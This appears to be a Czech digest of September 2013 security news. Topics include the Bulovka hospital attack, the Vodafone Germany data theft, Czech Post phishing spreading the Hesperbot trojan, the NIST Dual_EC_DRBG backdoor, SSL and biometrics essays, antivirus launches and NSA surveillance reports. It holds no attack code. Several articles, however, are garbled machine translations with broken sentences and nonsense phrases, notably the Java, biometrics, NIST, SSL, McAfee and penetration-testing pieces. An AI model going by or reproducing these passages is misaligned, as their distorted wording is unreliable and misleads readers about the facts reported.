"Zpravodajské úředníci také uznal, že soud musí své rozhodnutí opřít o informace NSA dává to, který nikdy nebyl dobrý základ pro brzd a protivah, která je charakteristickým znakem americké demokracie."
Java konečně dostane Whitelisting funkci 13. září 2013. Zabezpečení Poslední aktualizace Java Development Kit (JDK 7u40) obsahuje řadu oprav chyb, nové funkce zabezpečení a změny, a mezi nimi je ten, který byl už dávno:. Whitelisting volbou pro ochranu koncových bodů "Nasazení pravidlo stanovené funkce je pro podniky že spravovat jejich Java desktopové prostředí přímo, a poskytuje způsob, jak pro podniky, nadále používat staršími obchodními aplikacemi v prostředí stále utahování Java applet a Java Web Start politiky zabezpečení aplikací, "je vysvětleno v dokumentaci k funkci. Tato funkce umožňuje podniku na vytvoření whitelistu známých webových aplikací v jazyce Java, a ti na whitelist lze spustit bez jeho výzvy zabezpečení. Aby to fungovat, je nový Java Plug-in (k dispozici pouze od Java SE 6 Update 10) požadováno koncové body, ale i Java 7u40 (poslední verze), který bude použit k vytvoření pravidla, která pak bude pracovat pro starší verze. Tato funkce byla zavedena na pomoc společnostem, které nelze upgradovat na nejnovější verzi Java a může " t zakázat Java plug-in chránit své zaměstnance. sada pravidel je vytvořen pomocí XML souboru a budou muset být digitálně podepsán platným digitálním certifikátem vydaným důvěryhodnou certifikační autoritou. "Nasazení pravidlo stanovené funkce je volitelná a musí být používán pouze interně v organizaci řízeném prostředí. Pokud JAR soubor, který obsahuje sadu pravidel je distribuován nebo zpřístupněny veřejnosti, pak certifikát použitý k podepsání sadu pravidel bude na černé listině a zablokován v Javě ", pokyny k závěru.
Bulovku napadli hackeři, nemocnice se raději odřízla od sítě
13.9.2013 Hacking | Incident Pražskou nemocnici Na Bulovce v noci na čtvrtek napadli hackeři. Podle mluvčího zdravotnického zařízení Martina Šalka se ale k datům pacientů nedostali. Bulovka zajistila speciální lékařská vyšetření, běžné případy záchranka vozila rovnou do jiných nemocnic. Kvůli bezpečnosti byl od 03.00 do 11.00 vypnut vnitřní informační systém. Ten už ale funguje. Připojení na internet chce nemocnice obnovit ještě ve čtvrtek. Bulovka kvůli případu podá oznámení na neznámého pachatele. Spolupracuje také s Národním bezpečnostním úřadem.
„Dnes (ve čtvrtek) ve 03.00 došlo k útoku zvenčí na nemocniční systém, přičemž informatik mající službu nebezpečí včas rozpoznal, odpojil nemocnici od vnějšího světa a odpojil i jednotlivá pracoviště mezi sebou, tedy vnitřní informační sítě, aby data nebyla poškozena nebo smazána,” řekl Šalek.
Výpadek podle něj nemocniční provoz nijak zásadně neohrozil, péče byla poskytována, jen „procesy se trošku zpomalily”, protože kliniky si nemohly předávat výsledky vyšetření. Kapacita přístrojů tak byla omezená, nijak se to ale na počtu ošetřených neprojevilo.
Vyšetřeni byli podle Šalka na speciálních CT i tři pacienti, které přivezla na Bulovku záchranná služba, protože se nepodařilo domluvit CT vyšetření v jiné pražské nemocnici.
Někteří pacienti z ambulancí ORL se ze čtvrtka museli přeobjednat na jiný den.
Problémy se Pražanů výrazně nedotkly Mluvčí záchranné služby Jiřina Ernestová řekla, že po 08.00 oznámila Bulovka dispečinku záchranářů, že má problém s počítačovým připojením.
„Pro Pražany kvůli výpadku počítačů na Bulovce žádné omezení zdravotní péče nevzešlo, protože ty, kteří potřebovali speciálně jejich vybavení, jsme tam převezli a ostatní jsme vezli do jiných nemocnic,” řekla. Je to podle ní standardní postup, když v některé nemocnici dojde k technické závadě, nastane stop stav či o prázdninách odstávka.
Šalek dodal, že hned po odhalení útoku nemocnice informovala ministerstvo zdravotnictví jako svého zřizovatele a požádala záchranáře, aby, pokud to bude možné, vozili nemocné do jiných nemocnic.
Od 11.00 vše funguje, vnitřní systém předává snímky a zprávy mezi jednotlivými pracovišti. Nemocniční internet sice ještě nefunguje, neznamená to žádné ohrožení. Telefony fungují, pacienti mohou pro komunikaci a dotazy využít místo internetu Facebook a Twitter. Internet by měl být funkční ještě v průběhu čtvrtka, shrnul Šalek.
Hacker ukradl údaje o dvou miliónech zákazníků Vodafonu v Německu
13.9.2013 Incident | Hacking | Hrozby Neznámý hacker získal přístup na jeden ze serverů mobilního operátora Vodafone v Německu a ukradl osobní data o zhruba dvou miliónech zákazníků. Zástupci firmy to oznámili ve čtvrtek. Vodafone Deutschland, který je dceřinou společností britské Vodafone Group, má v Německu více než 32 miliónů zákazníků využívajících mobilní služby. Hacker se dostal ke jménům zákazníků, adresám a údajům o bankovních účtech. Hesla nebo bezpečnostní čísla ale nezískal. Podle společnosti není možné, že by mu údaje k něčemu mohly být.
„Tyto údaje lze stěží použít k získání přímého přístupu na bankovní účty dotčených klientů,” uvedla podle agentury Reuters společnost v prohlášení.
Útok provedl administrátor spolupracující firmy Zástupci Vodafonu Deutschland sdělili, že útok provedl administrátor počítačové sítě, který pracoval pro jinou společnost spolupracující s Vodafonem. Jeho totožnost ale zatím není známa, uvedla agentura AP.
Společnost na vyšetřování případu spolupracuje s policií. Také uzavřela cesty, kterými se hacker k jejím serverům dostal. Zákazníky přitom varovala, aby si dávali pozor na nevyžádané e-maily nebo telefonáty od lidí, kteří by mohli chtít ukradené údaje zneužít.
Vodafone Deutschland, který je dceřinou společností britské Vodafone Group, má v Německu více než 32 miliónů zákazníků využívajících mobilní služby.
Phishingové útoky na poštu neustávají, v Česku se napálily desítky lidí
12.9.2013 Phishing | Zabezpečení | Kriminalita
Masivní phishingová kampaň, ve které se už od začátku srpna útočníci vydávají za zaměstnance České pošty, stále neutichá. V těchto dnech byla zaznamenána další vlna podvodných e-mailů, jejichž prostřednictvím si lidé mohou zavirovat PC. Novinkám to potvrdila mluvčí pošty Marta Selicharová. „Cílem útoku je získat přihlašovací údaje klientů k jejich bankovním účtům. Podvodné e-maily jsou psány ve formě ‚Informace o zásilce‘, kde najde zákazník údaje o nedodání zásilky a upozornění na možné sankce,“ konstatovala Selicharová.
Ve zprávě je umístěn odkaz na podvodné stránky s trojským koněm Win32/Spy.Hesperbot. „Je to velmi silný bankovní trojský kůň s mnoha 'užitečnými' funkcemi, jako je logování zmáčknutých kláves, vytváření screenshotů a nahrávání videa. Dokáže také spustit vzdálenou proxy, vytvořit skrytý VNC server umožňující vzdáleně ovládat infikovaný počítač,“ popsal již dříve hrozbu bezpečnostní analytik Pavel Bašta z týmu CSIRT, který je provozován sdružením CZ.NIC.
Podvodný e-mail Podvodný e-mail FOTO: CSIRT
Podle něj jsou útočníci velice vychytralí a k penězům na účtu se dokážou dostat i přes potvrzovací SMS. „Oběti následně nutí k instalaci dalšího malwaru na jejich Android, Symbian či Blackberry telefony,“ dodal Bašta s tím, že pokud se jim podaří infikovat také mobil, v cestě k penězům na bankovním účtu jim už nic nebrání.
„Tímto virem byly již infikovány počítače v Turecku, Velké Británii, Portugalsku a desítky i v České republice. Upozorňujeme klienty, aby v žádném případě nereagovali na jakékoli výzvy, které obsahují adresu cpost@ceskaposta.net a její obměnu cpost@ceska-posta.net,“ uzavřela Selicharová.
Pošta již dříve kvůli podvodným e-mailům podala trestní oznámení na Policii ČR na neznámého pachatele. Pokud se lidé setkají s podvodnou zprávou, pošta žádá o přeposlání na adresu info@cpost.cz.
Kaspersky ochrání najednou Windows, Android a Mac OS
12.9.2013 Zabezpečení | Ochrana
Novou verzi svého řešení Internet Security uvedl na trh Kaspersky. Jde o variantu multi-device 2014, která, jak název napovídá, nabízí ochranu pro různá zařízení – pro počítače s Windows a MacOS a také pro mobilní přístroje s Androidem.
V současnosti je k dispozici česká verze řešení pro Windows, v krátké době prý lokalizace bude i pro Android.
Jakoukoliv kombinaci zařízení může uživatel chránit pomocí jediného aktivačního klíče. Dle průzkumu B2B International B2C Global Brand Tracker Survey z letošního dubna má totiž každá domácnost v průměru 4,5 zařízení připojeného k internetu.
Verze pro Windows obsahuje veškerou ochranu z produktů Internet Security 2014 a Anti-Virus 2014 a zahrnuje například Safe Money chránící před odcizením finančních prostředků při online transakcích a nakupování, dále obranu proti programům, které blokují obrazovku (tedy před trojskými koňmi, jejichž cílem je zablokování počítače a vydírání (tzv. ransomware).
Součástí je i funkce Automatic Exploit Prevention, automatická prevence zneužití slabých míst, jež zabraňuje škodlivému softwaru ve využívání slabých míst v operačním systému nebo v aplikacích, Trusted Applications Mode, která automaticky blokuje nevěrohodné programy či technologie ZETA Shield, sloužící k důkladnému hledání skrytých škodlivých kódů.
Varianta pro Android zase nabízí ochranu v reálném čase včetně automatického skenování stažených programů, možnost filtrování hovorů a zpráv SMS, funkce k minimalizaci zneužití cenných osobních údajů při ztrátě či krádeži zařízení, zejména pomocí vzdáleného přístupu a ovládání přes Kaspersky Anti-Theft Web Management.
V obraně biometrie
12.9.2013 Biometrie | Zabezpečení
K dispozici je nový iPhone a přichází s čidlem otisků prstů! Jaký lepší důvod mluvit trochu o biometrické. Za starých dobrých časů před Defcon a wardriving, Biometrie měl atmosféru "vysokou bezpečnost." Vzpomeňte si na film Jamese Bonda, kde vystřihnout chlapa oko obejít sítnice skener? Tyto dny jsou dávno pryč. Nyní jsme viděli otisků prstů a systém rozpoznávání obličejů je obejít tím, že jednoduché výtisky otisku prstu nebo obličeje nebo gumových forem otisků prstů používány namísto skutečné věci.
Tak jak smysluplná je snímač otisků prstů v těchto dnech? Správná odpověď je samozřejmě: To záleží. První na kvalitě senzoru, jednak na softwaru použitém k analýze získaných dat a nakonec alternativní metody ověřování nahradí nebo Metráže Nitě.
Během zápisu, Čidlo měří referenční obraz otisku prstu. Tento obraz je pak analyzován, a některé parametry jsou extrahovány z obrázku. Právě tyto parametry, nikoli původní obrázek, který bude použit k porovnání pozdějších pokusů o ověření. Samozřejmě, že žádné dva obrázky jsou docela podobní. To nemusí být možné určit všechny parametry, nebo některé další charakteristiky mohou být zjištěno, že nebyly viditelné v referenčním skenování. Výsledkem je to, že software je vytvořit prostor pro určitou variabilitu. Méně kvalitní snímače, může být poměrně velká variabilita, takže si jen s několika odlišnými parametry. Výsledek je stejný, jako má špatný heslo: Mnoho různých uživatelů skončí se stejným "otisk prstu", pokud jde o snímač se týká.
Takže co to znamená pro iPhone nebo mobilní zařízení autentizaci obecně? Problém s mobilním ověřování zařízení, vždy k tomu, že je obtížné pro uživatele k zadání hesla složité na malou klávesnici. Výsledkem je, že většina uživatelů vybrat krátké číselné PIN. Tam bylo několik dalších pokusů, například Android "vzor" login a používání kamer pro rozpoznávání obličeje. Rozpoznávání obličeje obvykle trpí špatným čidlem kvality az velmi variabilní osvětlení. Vzor přihlášení je docela elegantní nápad, ale myslím, že to nebyl testován dostatečně zjistit, kolik uživatelů si vybrat vzory ve skutečnosti lišit.
Existuje jedna věc, Apple se zdá, že se dobře: Údaje o otiscích prstů zůstane na telefonu, a není zálohována žádné cloudu. Pokud je tato informace se ztratil, mohl by útočník použít k rekonstrukci duplikát prstu, což by mohlo být použito pro biometrickou identifikaci i nad samotným přístrojem iPhone.
Pokud jde o kvalitu obrazového snímače a software: Budeme muset čekat na to zkouší jednou telefon je propuštěn. Pravděpodobně neobsahuje pokročilejší feat. Rues jako měření tělesné teploty uživatele nebo sledování průtoku krve. Ale doufám, že to bude lepší než 4-místný kód PIN.
Jeden jednoduchý zlepšení: Ať je to "skutečné dva faktor", které umožňuje uživatelům vyžadují zadání kódu PIN / heslo kromě otisku prstu. Mohl by udělali lépe než otisk prstu? Existuje několik různých společných biometrické senzory: rozpoznávání obličeje, otisků prstů, hmotnost / výška, sítnice skeny a iris skenování. Otisky prstů jsou pravděpodobně nejlépe s ohledem na cenu snímače a obtížnost získat data.
Na závěr: Tam je pravděpodobně jeden opravdu velký zranitelnost zde . Ukradený iPhone je pravděpodobné, že se vztahuje na uživatele otisky prstů. To by nemělo být příliš těžké pro útočníka zvednout otisk prstu mimo samotného telefonu obejít senzoru.
Backdoored NIST odhalen, bude znovu k přezkoumání
12.9.2013 Hrozby | Zabezpečení | Zranitelnosti
Po minulém týdnu zjevení , že NSA, mimo jiné ovlivnila Americký národní institut pro standardy a technologie (NIST) přijmout standard šifrování, který byl učiněn NBÚ zahrnovat slabost znají jen oni, NYT neodhalil že dotyčná norma je NIST Special Publication 800-90.
Přijato organizace v roce 2006, byl standard zřejmě autorem téměř výhradně kryptografické odborníky NSA, a zahrnuje čtyři deterministický Náhodné Bit generátory, mezi nimiž je jeden tzv. Dual_EC_DRBG, který by měl vytvářet náhodná čísla klíče osiva šifrování, ale jak se ukázalo, náhodné Čísla produkuje mají malé zkreslení. To nepřijde jako šok pro odbornou cryptographer Bruce Schneier, ani jeho kolegové Dan Shumow a Niels Ferguson, který v roce 2007 publikoval výzkum popisovat chybu a teoretizování, že to je úmyslné zadní dveře.
Na čas byl Schneier zmateni tím, proč NSA byl tak neústupný, o zařazení tohoto generátoru v normě. "To nedává smysl jako poklop: Je to veřejná, a dosti zřejmé Nemá smysl z technického hlediska:. to příliš zpomalit pro každého, kdo dobrovolně používat, a to nedává smysl z hlediska kompatibility zpětně:. Výměna jednoho generátor náhodných čísel pro jiného je snadné, "poznamenal, a doporučil, aby nikdo používat. Podle New York Times, standardní byl nejen přijat NIST, ale podle Mezinárodní organizace pro normalizaci a Kanady Communications bezpečnostního establishmentu, stejně.
NIST reagovala na odhalení tím, že "by nebylo úmyslně oslabit šifrovací standard" a že by i nadále své poslání " pracovat s kryptografickým společenství vytvořit co nejsilnější šifrování normy pro americkou vládu a průmysl jako celek. " "NIST má za sebou dlouhou historii rozsáhlé spolupráce s předními světovými kryptografie odborníků na podporu robustní šifrování. National Security Agency (NSA) se podílí ve vývojovém NIST kryptografie procesu, protože jeho uznávanými odborníky. NIST je rovněž vyžadováno zákonem konzultovat s NSA, "jsou dále vysvětleny. Konečně, v gestu dobré vůle a doufá, že se znovu získat některé z důvěry, že ztratily z bezpečnostní komunity, se znovu otevřela veřejnosti komentář období pro zvláštní vydání 800-90A a návrhy odborných publikací 800-90B a 90C-800 tak, aby se veřejnost může prohlédnout a vyjádřit se k normě podruhé. "Pokud jsou nalezeny chyby v těchto nebo jiných NIST standardy, budeme pracovat s kryptografickým společenství řešit tak rychle, jak je to možné ", uzavírají.
Zabezpečeníexistuje chyba zabezpečení aplikace Microsoft Office Excel 2007, které by mohlo umožnit spuštění libovolného kódu při otevření souboru s nebezpečným obsahem.Tato aktualizace odstraňuje toto slabé místo zabezpečení.
ZabezpečeníChyba zabezpečení sady Office 2003, která by mohla spuštění libovolného kódu při otevření souboru s nebezpečným obsahem.Tato aktualizace odstraňuje toto slabé místo zabezpečení.
Bezpečnostníchyba zabezpečení aktualizace Microsoft Office 2010 64-bit Edition, která by mohla umožnit spuštění libovolného kódu při otevření souboru s nebezpečným obsahem.Tato aktualizace odstraňuje toto slabé místo zabezpečení.
ZabezpečeníBylo zjištěno slabé místo ve softwarový produkt společnosti Microsoft, které by mohly mít vliv na váš systém.
ZDARMA
DATUM VYDÁNÍ:
09.09.2013
Chyba zabezpečení uvedené v roce Sophos Web spotřebiče
Zranitelnosti
Sophos vykázala kombinace vulnerabilties, které mohou být použity k provedení dálkové úrovně oprávnění a získat neoprávněný jedinečný přístup k zařízení. Podrobnosti lze nalézt zde http://www.sophos.com/en-us/support/knowledgebase/119773.aspx.
Je-li automatické aktualizace je povolena oprava by měla být použita bez dalšího zásahu.
SSL je rozbitá. No a co?
Hrozby | Zabezpečení | Šifrování
Je těžké ignorovat nejnovější zprávy o kampaních vláda sponzorovala internetových dozoru, které jsou údajně zapojit dešifrování protokolu SSL. Ve světle těchto zpráv, měli byste něco jinak? Záleží na tom, k vaší síti a jak? I když dnes jen malá skupina má k dispozici znalosti a zdroje k dešifrování SSL, je pravděpodobné, že toto tajemství bude unikat tak jako mnoho a zdroje nezbytné k uplatňování technik bude jen levnější a následně k dispozici dobře financované rad, jako je organizovaný zločin . Informace jednou dešifrovat mohou být také ohroženy jsou ohroženy kdo ohrožena organizace, která nyní drží data. Takže záleží na tom? Za prvé, já si nemyslím, že je "důkaz" v tomto okamžiku SSL samo o sobě bylo přerušeno. SSL a šifrovací algoritmy se jedná viděli mnoho implementačních problémů v minulosti, a to je správné předpokládat, že zlomená implementace, špatné generátory náhodných čísel a sub-optimální konfigurace činí prolomení "živou" SSL mnohem jednodušší, pak by mělo být založeno na síle základních algoritmů. Kromě toho, v mnoha význačných útoků, SSL nebyl problém. Koncový bod nebo SSL infrastruktura byla ohrožena místo a jako výsledek, šifrovací algoritmus nezáleží. Endpoint Security Žádný z "apt" úniku dat ve stylu měl hodně co do činění s dešifrování SSL. Místo toho, koncový bod ohrožena buď tím, že využívá technické zabezpečení v klientském softwaru, nebo pomocí techniky sociálního inženýrství oklamat uživatele do instalace škodlivého softwaru. Tyto techniky jsou staré, stále upravena a není omezen na sofistikované útoky. Každý den vidíme, kompromisy v rozmezí od "banálních" falešných UPS, e-mail na více chytrých napadených reklamních sítí k vysoce cílené a dobře řemeslně "spear phishing" útoky. Co je to "Endpoint"? Mnoho systémů slibují "end-to-end šifrování". Podle mého názoru, end-to-end šifrování znamená, že zpráva je zašifrována odesílatelem před přenosem a dešifrovat * Konečná * příjemci. Definice * vlastní * je rozhodující zde. Mnoho zpráv kódované systémy dešifrovat zprávu na serveru, znovu zašifrovat pro příjemce. Tento režim se vystavit vaši zprávu zachytit na relé bodu. Pokud nechcete ovládat relé bod, pak se vaše zpráva je ohrožena zachycuje. Například Skype. Skype používá docela solidní šifrovací systém. Aby však bylo možné podpořit vlastnosti, jako brány do jiných telefonních systémů, příslušná brána musí být schopen dešifrovat zprávy. Kdykoliv váš bezpečný komunikační systém je schopen komunikovat s nezajištěnými koncovými body, někdo musí být schopen dešifrovat zprávy. Podobně se systémy webmail.
Tam jsou některé pokusy postavit end-to-end šifrované systémy, webové pošty, které používají na straně klienta, JavaScript nebo pluginy pro šifrování a dešifrování zpráv. Ale tyto systémy nejsou v širokém použití v tomto bodě. Cloud zpráv systémy jsou samozřejmě v určité problematické a je třeba navrhnout opatrně, aby dešifrování "v oblaku", které zase funkcí přestávky, jako je hledání a indexování pomocí cloud zdroje. SSL infrastruktury Existují dva způsoby, jak "očichat" SSL: Na jedné straně můžete nahrávat SSL šifrované relace a dešifrovat je offline. Bez znalosti privátních klíčů nebo master klíče zúčastněných, tento proces je velmi obtížné, pokud vůbec možné. Mnohem více běžně používaný způsob, jak zachytit SSL použít "Man in The Middle" útoku. Opět se týká "end-to-end" pojetí. Útočník ukončí připojení SSL a znovu zašifruje jej zamýšlenému příjemci. SSL poskytuje podepsané certifikáty, aby se zabránilo tento útok, a klienti upozorní uživatele, pokud neplatný certifikát. Prvním problémem je, že uživatel může ignorovat varování, vzhledem k tomu, že příliš mnoho "skutečné" SSL certifikáty nejsou správně nakonfigurovány a produkovat toto upozornění. Za druhé, bude prohlížeč považovat certifikát za platné, pokud je podepsán důvěryhodnou certifikační autoritou. Certifikační orgány byly zneužity v minulosti. Mnoho vlád kontrolovat certifikační autority a jsou schopni generovat spolehlivé certifikáty vydávat jiné stránky. Lidské faktory kolem certifikačních autorit a útočníků budou moci získat platné certifikáty jsou mnohem větší hrozba a SSL může být považována za zlomené na nějakou dobu jako výsledek. Nástroje jako sslstrip bude samozřejmě kořist na lidské rozhraní komponenty opět vést k více "elegantní" člověka ve středním útoku. Tak co mám dělat? V zabezpečení sítě, vždy mám málo času a omezené zdroje k boji neomezené starosti.
Za prvé, soustředit se na koncových bodech. Ty jsou mnohem větší pravděpodobnost, že trpí kompromisu kvůli špatne koncový bod pak hrubou silou dešifrovat SSL relace. Za druhé, je potřeba zkontrolovat konfiguraci SSL klientů a serverů. Používáte nejsilnější možnou šifrovací algoritmus? Jste při použití nejdelších možných klíčů? Toto je jedna z věcí. Například, ne všechny systémy Podporuji něco za TLS 1.0. Přidat příslušných vylepšení vašeho plánu. Konečně: Šifrování všechno. Dokonce i sofistikované protivník má použít nějaký konečný zdroj pro provoz dešifrovat. Zvýšení pracovní zátěž pomocí šifrování veškeré komunikace, a to nejen "důležité" provoz je jeden způsob, jak prodloužit životnost vašich informací. V případě uzavřených sítí, které nemají ke komunikaci s okolním světem, za budování své vlastní SSL infrastruktury (NOT implementovat vlastní knihovny SSL). Nastavte si vlastní CA a důvěřovat pouze certifikáty podepsané svým vlastním CA. Ale nakonec, tráví svůj čas na problémy, které věci. Je až příliš snadné nechat se rozptylovat titulkem dne.
NSA měla přístup k obsahu chytrých telefonů
10.9.2013 Mobil | Bezpečnost
Podle informací německého deníku Der Spiegel měly americké a britské vládní agentury přístup k uživatelským datům uloženým na chytrých telefonech.
Zařízení se značkou Apple dobývají firemní prostředí Zařízení s iOS při synchronizaci zpomalují servery Exchange Zoner AntiVirus Free i pro Android Zemřel Steve Jobs - vizionář, který vzkřísil Apple Zájem o smartphony Nokia padá, Apple oslavuje SecurityWorld Pro kyberzločince není žádná firma dost malá Google spěchá na šifrování provozu mezi datacentry NSA není všemocná, data lze před ní stále uchránit
Pro NSA nebyl podle Der Spiegelu problém překonat ochranné mechanismy chytrých telefonů od Applu, BlackBerry i zařízení s operačním systémem Android. Americká vládní agentura tak měla prakticky volný přístup k citlivým datům obrovského množství uživatelů po celém světě.
Z dokumentů, které má německý deník k dispozici, vyplývá, že NSA mohla snadno získat seznam kontaktů, přehled hovorů, informace o lokaci, poznámky nebo obsah textových zpráv. Na druhou stranu není jasné, v jaké míře NSA této možnosti využívala. Podle Der Spiegelu je pravděpodobné, že takto špehovala pouze vybrané jedince.
Vedle americké NSA se měla na špehování uživatelů podílet také její britská obdoba GCHQ. Podle Der Spiegelu obě agentury vytvořily pro každý typ telefonu vlastní pracovní skupinu. Oficiálním důvodem špehování měla být ochrana proti potenciálním hrozbám, zejména pak terorismu.
Zástupce Googlu, výrobce operačního systému Android, se již vyjádřil v tom smyslu, že společnost o existenci špehovacích pracovních skupin neměla žádné ponětí. Google také rozhodně odmítá, že by vládním organizacím svůj operačním systém sám zpřístupnil.
„Uživatelská data zpřístupňujeme vládním organizací pouze v souladu se zákonem. Bezpečnost našich uživatelů má pro nás nejvyšší prioritu,“ uvedl Google.
Z dokumentů dále podle Der Spiegelu vyplývá, že po určité období v roce 2009 neměla NSA přístup k uživatelským datům v zařízeních BlackBerry, protože kanadský výrobce v té době začal používat novou metodu pro kompresi dat. Tento „problém“ se však NSA nakonec podařilo vyřešit. V britské GCHQ pak podle dokumentů překonání této překážky dokonce slavili jako velký úspěch.
Der Spiegel neuvedl, jak se k dokumentům dostal. Jedním z autorů článku je však Laura Poitrasová, americká režisérka s úzkými kontakty na Edwarda Snowdena, který v současnosti stále ještě pobývá v Rusku.
McAfee vydává 2014 základní produkty zabezpečení počítače
09.09.2013. Zabezpečení | Ochrana
McAfee oznámila novou řadu 2014 základních sad zabezpečení počítače poskytující vyšší výkon a lepší s lehčí a rychlejší stopu, která vede ke zvýšení uživatelské zkušenosti. Řada zahrnuje McAfee AntiVirus Plus 2014, McAfee Internet Security 2014 a McAfee Total Protection 2014. Se vylepšení své nedávno modernizované malware skenovacího jádra - McAfee AM Core - poprvé představen s 2013 řádku McAfee 2014 Počítačové produkty nabízejí vyšší detekční schopnosti k ochraně proti nejvyspělejší hrozby. Nový motor zajišťuje rychlé a efektivní skenování a real-time inteligenci pomoci dynamicky bránit před nejnovějšími digitálními nebezpečími, včetně zero-day hrozby, keyloggery, trojské koně a zároveň minimalizuje dopad na systémy uživatelů. Konkrétní součásti produktu byly také přepracována v roce 2014 vedení zvýšit rychlost skenování tím, že sníží velikost souborů signatur a lepší využití procesoru. "Díky neustálému zvyšování komponenty základní bezpečnostní spotřebitelského portfolia společnosti McAfee, my se snažíme zajistit našim zákazníkům zůstat v bezpečí od hráze všudypřítomné online hrozbami a způsobem, který udržuje rychlost a výkon jejich zařízení, "řekl Alan LeFort, viceprezident pro řízení spotřebních výrobků v McAfee. "Naše řada 2014 nám umožňuje dále splnit svůj slib, aby účinně a efektivně chránit digitální život připojených uživatelů po celém světě." Vylepšení v roce 2014 řadu produktů základní PC jsou využívány také McAfee LiveSafe služby, první z svého druhu, cross-device řešení, které komplexně chrání data spotřebitelů, identitu a všechny PC, Macy, smartphony a tablety uživatel vlastní. trh v květnu 2013 McAfee LiveSafe zahrnuje osobní Locker, což je funkce, která používá tváří a hlasem ověřování technologie Chcete-li načíst uživatele nejvíce citlivé osobní informace a dokumenty, jako jsou kopie pasů a identifikačními čísly, ze zabezpečeného umístění online. Kromě ochrany spotřebitele před nejnovějšími online hrozbami a viry, McAfee LiveSafe služba také nabízí zjednodušenou a automatizovanou správu uživatelských jmen a hesel, ochrana soukromí pro smartphone a tablet, jakož i prvotřídní oceněné zákaznickou podporu. McAfee také nedávno aktualizovala svou cenu -vyhrávat McAfee Mobile Security výrobek s novými, špičkovými funkcí ochrany osobních údajů, včetně multi-uživatelského profilu App funkce, která umožňuje zákazníkům vytvořit více uživatelských profilů nebo "bezpečné zóny" na jednom zařízení s vlastní nebo omezený přístup k aplikacím. Nová verze také nabízí možnost volby mezi základní a prémiové verzi. McAfee Mobile Security nabízí základní základní ochranu pro mobilní zařízení bez nákladů, prémie verze nabízí celou řadu bezpečnostních prvků a nejlepší ve své třídě ochrany osobních údajů.
Jak důležitá je penetrační testování?
09.09.2013. Nástroje | Zabezpečení
S kybernetické útoky stávají normou, je mnohem důležitější než kdy jindy, aby prováděly pravidelná zranitelností a penetrační testy, nalézt slabiny, a zajistit na pravidelném základě, že kybernetické kontroly fungují. Geraint Williams, senior konzultant v oblasti IT Governance, vysvětluje: " zranitelností zkoumá vystavené aktiva (sítě, servery, aplikace) zranitelnosti - Odvrácená strana zranitelnosti skenování je, že falešně pozitivní výsledky jsou často hlášeny. Falešně pozitivní výsledky mohou být znamením, že stávající řízení není plně efektivní, tzn sanitaci aplikace vstupu a výstupu, a to zejména na internetových aplikací. " Penetrační testování se zaměřuje na zranitelnosti a bude se snažit a využívat je. Testování se často zastaví, když je dosaženo cíle, tj. při přístupu k síti bylo dosaženo - to znamená, že je možné i jiné využitelné chyby nejsou testovány ". Organizace musí provádět pravidelné kontroly jejich systémů, z těchto hlavních důvodů:
Chcete-li zjistit nedostatky v infrastruktuře (hardware), aplikace (software) a lidé s cílem rozvíjet kontroly Pro zajištění kontroly byly realizovány a jsou efektivní - to poskytuje záruku bezpečnosti informací a vrcholového vedení Pro testování aplikací, které jsou často cesty k útoku (Aplikace jsou postaveny lidmi, kteří mohou dělat chyby navzdory osvědčených postupů v oblasti vývoje softwaru) Chcete-li zjistit nové chyby ve stávajícím softwarem (záplaty a aktualizace mohou opravit stávající chyby, ale oni mohou také zavést nová zranitelná místa). Geraint dodává: "Pokud jsou lidé napadeni prostřednictvím sociálního inženýrství to obchází silnější obvodové prvky a vystavuje do méně chráněných vnitřních aktiv. Nejhorší situace je mít exploitovatelnou zranitelnost v rámci infrastruktury, aplikací nebo lidé, kteří si nejsou vědomi, jak útočníci být sondování svůj majetek, i když nejste. Porušení, pokud uveřejněný útočníků, může zůstat nepovšimnuto několik měsíců. " zranitelností a penetrační testy mohou testovat organizacím schopnost detekovat útoky a porušování. Organizace potřebují skenovat externí dostupné infrastruktury a aplikací, abyste se chránili před vnějšími hrozbami. Oni také potřebují skenovat vnitřně chránit proti obchodování zasvěcených ohrožení a ohrožení jednotlivců. Interní testování musí zahrnovat kontroly mezi jednotlivými bezpečnostních zón (DMZ, prostředí dat držitelů karet, SCADA prostředí atd.), aby tito jsou správně konfigurovány. Pen testy by měly být prováděny pravidelně, aby se odhalit nedávno zjistil, dosud neznámé chyby. Minimální frekvence závisí na typu, který se provádí testování a cílem testu. Zkoušení by mělo být nejméně jednou ročně, a možná měsíčník pro vnitřní zranitelností pracovních stanic, normy, jako je PCI DSS doporučujeme intervaly pro různé typy skenování. Pen testování by mělo být prováděno po zavedení nové infrastruktury a aplikací, stejně jako po velkých změn infrastruktury a aplikace (např. změny pravidel brány firewall, aktualizace firmwaru, záplaty a upgrady softwaru).
Google spěchá na šifrování provozu mezi datacentry
9.9.2013 Šifrování | Zabezpečení
Google se rozhodl urychlit nasazení šifrování mezi svými datacentry v rámci ochrany před NSA.
Podle pátečního prohlášení představitelů společnosti dojde k rychlejšímu nasazení šifrování datových toků mezi jejími datacentry, která jsou rozmístěna po celém světě. Má jít o další krok ve snaze zamezit sledovacím aktivitám americké agentury NSA, ale i výzvědných služeb jiných zemí.
Podle poskytnutých informací padlo rozhodnutí o této šifrovací iniciativě již v loňském roce, tedy ještě před tím, než se provalila aféra PRISM. V červnu byla ale maximálně urychlena v reakci na kritiku, které byl gigantický poskytovatel webových služeb vystaven. Eric Grosse, viceprezident bezpečnostní divize Googlu, říká: „Je to závod ve zbrojení. A my víme, že vládní agentury patří mezi neschopnější hráče této hry.“
Připomeňme, že podle informací poprvé uveřejněných v denících Washington Post a Guardian, je Google jednou z mnoha velkých internetových společností, které poskytují NSA data svých zákazníků. Podle dalších dokumentů Edwarda Snowdena používá NSA pro boj se šifrováním řadu prostředků, od získání dešifrovacích klíčů po superpočítače lámající kódy hrubým výpočetním výkonem. A nejen to, v minulosti ovlivnila řadu bezpečnostních standardů a učinila je zranitelnějšími vůči určitým metodám útoků.
Podle řady expertů jakékoli šifrování ale přece jen vládní snahy o získání absolutního přístup k datům komplikuje. Podstatně navyšuje prostředky nezbytné pro zpracovávání dat a zpracovávající agenturu nutí k selektivnosti – ta sice může shromažďovat veškerá zachycená data, ale dešifrovat může jen komunikaci prioritních cílů. Tedy přinejmenším v krátkém časovém rámci.
